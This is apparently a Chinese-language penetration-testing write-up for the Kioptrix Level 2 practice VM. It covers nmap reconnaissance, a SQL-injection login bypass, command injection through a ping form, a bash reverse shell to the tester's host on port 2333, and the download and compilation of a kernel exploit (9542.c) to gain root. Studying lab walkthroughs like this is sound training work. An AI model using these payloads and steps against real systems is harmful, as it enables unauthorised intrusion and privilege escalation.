信息收集 同样是netdiscover收集信息,发现目标IP地址。
目标的IP地址为192.168.43.47
nmap扫描端口信息
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 root@kali:~# nmap -sS -A -T4 192.168.43.47 Starting Nmap 7.70 ( https://nmap.org ) at 2018-05-07 05:01 EDT Nmap scan report for 192.168.43.47 Host is up (0.00047s latency). Not shown: 994 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99) | ssh-hostkey: | 1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1) | 1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA) |_ 1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA) |_sshv1: Server supports SSHv1 80/tcp open http Apache httpd 2.0.52 ((CentOS)) |_http-server-header: Apache/2.0.52 (CentOS) |_http-title: Site doesn't have a title (text/html; charset=UTF-8). 111/tcp open rpcbind 2 (RPC #100000) | rpcinfo: | program version port/proto service | 100000 2 111/tcp rpcbind | 100000 2 111/udp rpcbind | 100024 1 841/udp status |_ 100024 1 844/tcp status 443/tcp open ssl/http Apache httpd 2.0.52 ((CentOS)) |_http-server-header: Apache/2.0.52 (CentOS) |_http-title: Site doesn't have a title (text/html; charset=UTF-8). | ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=-- | Not valid before: 2009-10-08T00:10:47 |_Not valid after: 2010-10-08T00:10:47 |_ssl-date: 2018-05-07T05:51:42+00:00; -3h09m44s from scanner time. | sslv2: | SSLv2 supported | ciphers: | SSL2_DES_64_CBC_WITH_MD5 | SSL2_RC4_128_WITH_MD5 | SSL2_RC4_128_EXPORT40_WITH_MD5 | SSL2_RC2_128_CBC_WITH_MD5 | SSL2_DES_192_EDE3_CBC_WITH_MD5 | SSL2_RC4_64_WITH_MD5 |_ SSL2_RC2_128_CBC_EXPORT40_WITH_MD5 631/tcp open ipp CUPS 1.1 | http-methods: |_ Potentially risky methods: PUT |_http-server-header: CUPS/1.1 |_http-title: 403 Forbidden 3306/tcp open mysql MySQL (unauthorized) MAC Address: 00:0C:29:53:19:4C (VMware) Device type: general purpose Running: Linux 2.6.X OS CPE: cpe:/o:linux:linux_kernel:2.6 OS details: Linux 2.6.9 - 2.6.30 Network Distance: 1 hop Host script results: |_clock-skew: mean: -3h09m44s, deviation: 0s, median: -3h09m44s TRACEROUTE HOP RTT ADDRESS 1 0.47 ms 192.168.43.47 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 17.46 seconds
漏洞利用 存在80/tcp open http Apache httpd 2.0.52 ((CentOS))端口
尝试万能密码' or 1=1# ,成功登录。
可以看到一个执行ping命令的框框。
可见是一个命令执行漏洞。
在命令执行中是有| && || ;这些常见的符号的。
1 2 3 4 5 6 7 8 9 10 11 root@kali:~# whoai||id //如果||左边的命令(命令1)未执行成功,那么就执行||右边的命令(命令2); bash: whoai: 未找到命令 uid=0(root) gid=0(root) 组=0(root) root@kali:~# whoami|id //执行后一个命令 uid=0(root) gid=0(root) 组=0(root) root@kali:~# whoami;id //按顺序执行 root uid=0(root) gid=0(root) 组=0(root) root@kali:~# whoami&&id //&&左边的命令(命令1)返回真(即返回0,成功被执行)后,&&右边的命令(命令2)才能够被执行 root uid=0(root) gid=0(root) 组=0(root)
这里我们可以利用| ;进行命令执行
测试cat /etc/passwd
下面用命令执行一个交互shell.
1 ;bash -i >& /dev/tcp/192.168.43.177/2333 0>&1
同时用nc监听2333端口。
得到一个交互shell。但是权限是apache用户。
权限提升 当前的权限是apache用户,我们需要对他进行提权得到root权限。
1 2 bash-3.00$ uname -a Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 i686 i386 GNU/Linux
查看当前系统版本。searchsploit linux 2.6.9查找相关提权漏洞
https://www.exploit-db.com/download/9542.c
利用到9542.c的exp.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 bash-3.00$ cd /tmp bash-3.00$ wget http://192.168.43.177/9542.c --03:06:55-- http://192.168.43.177/9542.c => `9542.c' Connecting to 192.168.43.177:80... connected. HTTP request sent, awaiting response... 200 OK Length: 2,645 (2.6K) [text/x-csrc] 0K .. 100% 252.25 MB/s 03:06:55 (252.25 MB/s) - `9542.c' saved [2645/2645] bash-3.00$ gcc -o 9542 9542.c bash-3.00$ ./9542 sh: no job control in this shell sh-3.00# id uid=0(root) gid=0(root) groups=48(apache) sh-3.00# whoami root
提权成功。
